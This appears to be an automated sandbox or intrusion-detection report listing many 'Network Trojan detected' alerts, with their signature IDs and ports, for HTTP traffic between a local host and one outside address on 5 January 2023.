            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750073802024313 01/05/23-08:54:00.951462
            SID:2024313
            Source Port:50073
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750017802024318 01/05/23-08:53:44.537455
            SID:2024318
            Source Port:50017
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750073802024318 01/05/23-08:54:00.951462
            SID:2024318
            Source Port:50073
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497612025483 01/05/23-08:52:28.674558
            SID:2025483
            Source Port:80
            Destination Port:49761
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749774802025381 01/05/23-08:52:32.369884
            SID:2025381
            Source Port:49774
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749869802025381 01/05/23-08:53:01.298022
            SID:2025381
            Source Port:49869
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749952802825766 01/05/23-08:53:25.200806
            SID:2825766
            Source Port:49952
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749975802825766 01/05/23-08:53:33.363507
            SID:2825766
            Source Port:49975
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749965802025381 01/05/23-08:53:30.671447
            SID:2025381
            Source Port:49965
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750083802024318 01/05/23-08:54:03.789158
            SID:2024318
            Source Port:50083
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500622025483 01/05/23-08:53:58.155004
            SID:2025483
            Source Port:80
            Destination Port:50062
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749834802825766 01/05/23-08:52:50.512718
            SID:2825766
            Source Port:49834
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749755802024313 01/05/23-08:52:26.961334
            SID:2024313
            Source Port:49755
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749910802021641 01/05/23-08:53:13.740225
            SID:2021641
            Source Port:49910
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500512025483 01/05/23-08:53:55.178783
            SID:2025483
            Source Port:80
            Destination Port:50051
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749755802024318 01/05/23-08:52:26.961334
            SID:2024318
            Source Port:49755
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750083802024313 01/05/23-08:54:03.789158
            SID:2024313
            Source Port:50083
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749922802025381 01/05/23-08:53:17.061545
            SID:2025381
            Source Port:49922
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750007802024318 01/05/23-08:53:41.829015
            SID:2024318
            Source Port:50007
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750082802825766 01/05/23-08:54:03.532238
            SID:2825766
            Source Port:50082
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498212025483 01/05/23-08:52:46.920509
            SID:2025483
            Source Port:80
            Destination Port:49821
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749879802025381 01/05/23-08:53:03.965987
            SID:2025381
            Source Port:49879
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750007802024313 01/05/23-08:53:41.829015
            SID:2024313
            Source Port:50007
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749929802825766 01/05/23-08:53:18.948979
            SID:2825766
            Source Port:49929
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500142025483 01/05/23-08:53:43.800760
            SID:2025483
            Source Port:80
            Destination Port:50014
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749722802021641 01/05/23-08:52:17.506386
            SID:2021641
            Source Port:49722
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750016802021641 01/05/23-08:53:44.267939
            SID:2021641
            Source Port:50016
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749748802825766 01/05/23-08:52:24.879047
            SID:2825766
            Source Port:49748
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749709802024313 01/05/23-08:52:11.256691
            SID:2024313
            Source Port:49709
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749962802825766 01/05/23-08:53:29.855666
            SID:2825766
            Source Port:49962
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749965802825766 01/05/23-08:53:30.671447
            SID:2825766
            Source Port:49965
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749709802024318 01/05/23-08:52:11.256691
            SID:2024318
            Source Port:49709
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749900802021641 01/05/23-08:53:10.997847
            SID:2021641
            Source Port:49900
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749787802825766 01/05/23-08:52:37.509502
            SID:2825766
            Source Port:49787
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749863802021641 01/05/23-08:52:59.703117
            SID:2021641
            Source Port:49863
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497492025483 01/05/23-08:52:25.244471
            SID:2025483
            Source Port:80
            Destination Port:49749
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750049802021641 01/05/23-08:53:54.543372
            SID:2021641
            Source Port:50049
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749807802021641 01/05/23-08:52:43.044779
            SID:2021641
            Source Port:49807
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499192025483 01/05/23-08:53:16.269988
            SID:2025483
            Source Port:80
            Destination Port:49919
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749836802025381 01/05/23-08:52:51.681664
            SID:2025381
            Source Port:49836
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498982025483 01/05/23-08:53:09.925316
            SID:2025483
            Source Port:80
            Destination Port:49898
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749788802024318 01/05/23-08:52:37.784136
            SID:2024318
            Source Port:49788
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749788802024313 01/05/23-08:52:37.784136
            SID:2024313
            Source Port:49788
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749995802825766 01/05/23-08:53:38.676723
            SID:2825766
            Source Port:49995
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498872025483 01/05/23-08:53:06.208980
            SID:2025483
            Source Port:80
            Destination Port:49887
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498762025483 01/05/23-08:53:03.261443
            SID:2025483
            Source Port:80
            Destination Port:49876
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750040802024318 01/05/23-08:53:52.135869
            SID:2024318
            Source Port:50040
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749824802825766 01/05/23-08:52:47.639113
            SID:2825766
            Source Port:49824
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749955802025381 01/05/23-08:53:25.989714
            SID:2025381
            Source Port:49955
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750040802024313 01/05/23-08:53:52.135869
            SID:2024313
            Source Port:50040
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749890802825766 01/05/23-08:53:06.934564
            SID:2825766
            Source Port:49890
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749991802025381 01/05/23-08:53:37.629731
            SID:2025381
            Source Port:49991
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500362025483 01/05/23-08:53:51.130015
            SID:2025483
            Source Port:80
            Destination Port:50036
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749787802021641 01/05/23-08:52:37.509502
            SID:2021641
            Source Port:49787
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750004802024313 01/05/23-08:53:41.033557
            SID:2024313
            Source Port:50004
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750004802024318 01/05/23-08:53:41.033557
            SID:2024318
            Source Port:50004
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749864802024318 01/05/23-08:52:59.960618
            SID:2024318
            Source Port:49864
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749814802825766 01/05/23-08:52:44.953030
            SID:2825766
            Source Port:49814
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498322025483 01/05/23-08:52:49.888875
            SID:2025483
            Source Port:80
            Destination Port:49832
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749725802825766 01/05/23-08:52:18.390674
            SID:2825766
            Source Port:49725
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749856802025381 01/05/23-08:52:57.793570
            SID:2025381
            Source Port:49856
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749959802024318 01/05/23-08:53:28.075379
            SID:2024318
            Source Port:49959
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749702802021641 01/05/23-08:52:08.155254
            SID:2021641
            Source Port:49702
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749864802024313 01/05/23-08:52:59.960618
            SID:2024313
            Source Port:49864
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749953802024313 01/05/23-08:53:25.469204
            SID:2024313
            Source Port:49953
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749781802021641 01/05/23-08:52:35.821668
            SID:2021641
            Source Port:49781
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749953802024318 01/05/23-08:53:25.469204
            SID:2024318
            Source Port:49953
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749945802025381 01/05/23-08:53:23.275014
            SID:2025381
            Source Port:49945
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750052802025381 01/05/23-08:53:55.369344
            SID:2025381
            Source Port:50052
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749899802825766 01/05/23-08:53:10.169881
            SID:2825766
            Source Port:49899
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500032025483 01/05/23-08:53:40.844768
            SID:2025483
            Source Port:80
            Destination Port:50003
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750082802021641 01/05/23-08:54:03.532238
            SID:2021641
            Source Port:50082
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749831802024318 01/05/23-08:52:49.539016
            SID:2024318
            Source Port:49831
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749797802021641 01/05/23-08:52:40.255110
            SID:2021641
            Source Port:49797
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749909802825766 01/05/23-08:53:13.489642
            SID:2825766
            Source Port:49909
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749831802024313 01/05/23-08:52:49.539016
            SID:2024313
            Source Port:49831
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750010802825766 01/05/23-08:53:42.643021
            SID:2825766
            Source Port:50010
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749949802024318 01/05/23-08:53:24.361661
            SID:2024318
            Source Port:49949
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749886802021641 01/05/23-08:53:05.845633
            SID:2021641
            Source Port:49886
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750020802021641 01/05/23-08:53:45.631791
            SID:2021641
            Source Port:50020
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749840802025381 01/05/23-08:52:53.465268
            SID:2025381
            Source Port:49840
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497722025483 01/05/23-08:52:31.725573
            SID:2025483
            Source Port:80
            Destination Port:49772
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749846802025381 01/05/23-08:52:55.097334
            SID:2025381
            Source Port:49846
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749949802024313 01/05/23-08:53:24.361661
            SID:2024313
            Source Port:49949
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749935802025381 01/05/23-08:53:20.565175
            SID:2025381
            Source Port:49935
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749781802825766 01/05/23-08:52:35.821668
            SID:2825766
            Source Port:49781
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749791802021641 01/05/23-08:52:38.617554
            SID:2021641
            Source Port:49791
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749998802825766 01/05/23-08:53:39.461942
            SID:2825766
            Source Port:49998
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749751802025381 01/05/23-08:52:25.762510
            SID:2025381
            Source Port:49751
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497832025483 01/05/23-08:52:36.476500
            SID:2025483
            Source Port:80
            Destination Port:49783
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749870802825766 01/05/23-08:53:01.561418
            SID:2825766
            Source Port:49870
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750060802024313 01/05/23-08:53:57.543966
            SID:2024313
            Source Port:50060
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749725802021641 01/05/23-08:52:18.390674
            SID:2021641
            Source Port:49725
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750020802825766 01/05/23-08:53:45.631791
            SID:2825766
            Source Port:50020
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499622025483 01/05/23-08:53:29.944322
            SID:2025483
            Source Port:80
            Destination Port:49962
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750026802825766 01/05/23-08:53:48.341265
            SID:2825766
            Source Port:50026
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750049802825766 01/05/23-08:53:54.543372
            SID:2825766
            Source Port:50049
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749715802825766 01/05/23-08:52:14.021138
            SID:2825766
            Source Port:49715
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749757802025381 01/05/23-08:52:27.498112
            SID:2025381
            Source Port:49757
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499732025483 01/05/23-08:53:32.908458
            SID:2025483
            Source Port:80
            Destination Port:49973
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750036802021641 01/05/23-08:53:51.046851
            SID:2021641
            Source Port:50036
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750060802024318 01/05/23-08:53:57.543966
            SID:2024318
            Source Port:50060
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749930802024318 01/05/23-08:53:19.220224
            SID:2024318
            Source Port:49930
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749896802021641 01/05/23-08:53:08.759564
            SID:2021641
            Source Port:49896
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750013802021641 01/05/23-08:53:43.455950
            SID:2021641
            Source Port:50013
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749930802024313 01/05/23-08:53:19.220224
            SID:2024313
            Source Port:49930
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499952025483 01/05/23-08:53:38.758200
            SID:2025483
            Source Port:80
            Destination Port:49995
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749985802021641 01/05/23-08:53:36.027311
            SID:2021641
            Source Port:49985
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749741802025381 01/05/23-08:52:22.916909
            SID:2025381
            Source Port:49741
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749791802825766 01/05/23-08:52:38.617554
            SID:2825766
            Source Port:49791
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498042025483 01/05/23-08:52:42.259302
            SID:2025483
            Source Port:80
            Destination Port:49804
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750050802024313 01/05/23-08:53:54.799294
            SID:2024313
            Source Port:50050
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749880802825766 01/05/23-08:53:04.232334
            SID:2825766
            Source Port:49880
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750039802825766 01/05/23-08:53:51.865723
            SID:2825766
            Source Port:50039
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749765802024318 01/05/23-08:52:29.748218
            SID:2024318
            Source Port:49765
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749768802024318 01/05/23-08:52:30.564042
            SID:2024318
            Source Port:49768
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750050802024318 01/05/23-08:53:54.799294
            SID:2024318
            Source Port:50050
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749765802024313 01/05/23-08:52:29.748218
            SID:2024313
            Source Port:49765
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497502025483 01/05/23-08:52:25.555747
            SID:2025483
            Source Port:80
            Destination Port:49750
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749854802024313 01/05/23-08:52:57.240558
            SID:2024313
            Source Port:49854
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749768802024313 01/05/23-08:52:30.564042
            SID:2024313
            Source Port:49768
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749943802024318 01/05/23-08:53:22.718924
            SID:2024318
            Source Port:49943
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749854802024318 01/05/23-08:52:57.240558
            SID:2024318
            Source Port:49854
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749943802024313 01/05/23-08:53:22.718924
            SID:2024313
            Source Port:49943
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750026802021641 01/05/23-08:53:48.341265
            SID:2021641
            Source Port:50026
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749919802825766 01/05/23-08:53:16.188265
            SID:2825766
            Source Port:49919
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749712802825766 01/05/23-08:52:12.436257
            SID:2825766
            Source Port:49712
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749712802021641 01/05/23-08:52:12.436257
            SID:2021641
            Source Port:49712
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750079802024313 01/05/23-08:54:02.588823
            SID:2024313
            Source Port:50079
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749801802021641 01/05/23-08:52:41.371912
            SID:2021641
            Source Port:49801
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749801802825766 01/05/23-08:52:41.371912
            SID:2825766
            Source Port:49801
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749932802025381 01/05/23-08:53:19.762349
            SID:2025381
            Source Port:49932
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749972802021641 01/05/23-08:53:32.566966
            SID:2021641
            Source Port:49972
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749817802021641 01/05/23-08:52:45.747633
            SID:2021641
            Source Port:49817
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750063802024313 01/05/23-08:53:58.331391
            SID:2024313
            Source Port:50063
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750065802025381 01/05/23-08:53:58.843527
            SID:2025381
            Source Port:50065
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749906802021641 01/05/23-08:53:12.686115
            SID:2021641
            Source Port:49906
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750063802024318 01/05/23-08:53:58.331391
            SID:2024318
            Source Port:50063
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749959802024313 01/05/23-08:53:28.075379
            SID:2024313
            Source Port:49959
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500242025483 01/05/23-08:53:47.891283
            SID:2025483
            Source Port:80
            Destination Port:50024
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750083802025381 01/05/23-08:54:03.789158
            SID:2025381
            Source Port:50083
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749755802025381 01/05/23-08:52:26.961334
            SID:2025381
            Source Port:49755
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749896802825766 01/05/23-08:53:08.759564
            SID:2825766
            Source Port:49896
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750022802025381 01/05/23-08:53:46.665385
            SID:2025381
            Source Port:50022
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749740802825766 01/05/23-08:52:22.636691
            SID:2825766
            Source Port:49740
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749839802024313 01/05/23-08:52:53.202583
            SID:2024313
            Source Port:49839
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499442025483 01/05/23-08:53:23.101688
            SID:2025483
            Source Port:80
            Destination Port:49944
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749836802021641 01/05/23-08:52:51.681664
            SID:2021641
            Source Port:49836
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749839802024318 01/05/23-08:52:53.202583
            SID:2024318
            Source Port:49839
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749984802025381 01/05/23-08:53:35.743967
            SID:2025381
            Source Port:49984
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749835802825766 01/05/23-08:52:50.902278
            SID:2825766
            Source Port:49835
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749831802021641 01/05/23-08:52:49.539016
            SID:2021641
            Source Port:49831
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750058802021641 01/05/23-08:53:57.002594
            SID:2021641
            Source Port:50058
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749940802024318 01/05/23-08:53:21.893765
            SID:2024318
            Source Port:49940
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749926802021641 01/05/23-08:53:18.143087
            SID:2021641
            Source Port:49926
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498862025483 01/05/23-08:53:05.936188
            SID:2025483
            Source Port:80
            Destination Port:49886
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499032025483 01/05/23-08:53:11.958213
            SID:2025483
            Source Port:80
            Destination Port:49903
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750072802024318 01/05/23-08:54:00.683642
            SID:2024318
            Source Port:50072
            Destination Port:80
            Protocol:TCP
